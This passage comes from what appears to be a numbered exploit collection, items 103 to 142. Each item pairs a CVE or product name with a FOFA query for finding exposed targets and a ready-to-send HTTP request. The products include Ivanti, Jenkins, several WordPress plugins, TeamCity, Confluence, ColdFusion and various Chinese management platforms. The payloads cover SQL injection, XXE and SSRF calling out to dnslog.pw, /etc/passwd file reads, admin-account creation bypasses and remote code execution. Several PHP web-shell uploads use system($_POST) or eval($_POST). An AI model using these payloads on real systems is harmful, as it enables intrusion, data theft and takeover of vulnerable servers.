             </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 to 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64 encoding of the SQL statement; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立迅) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

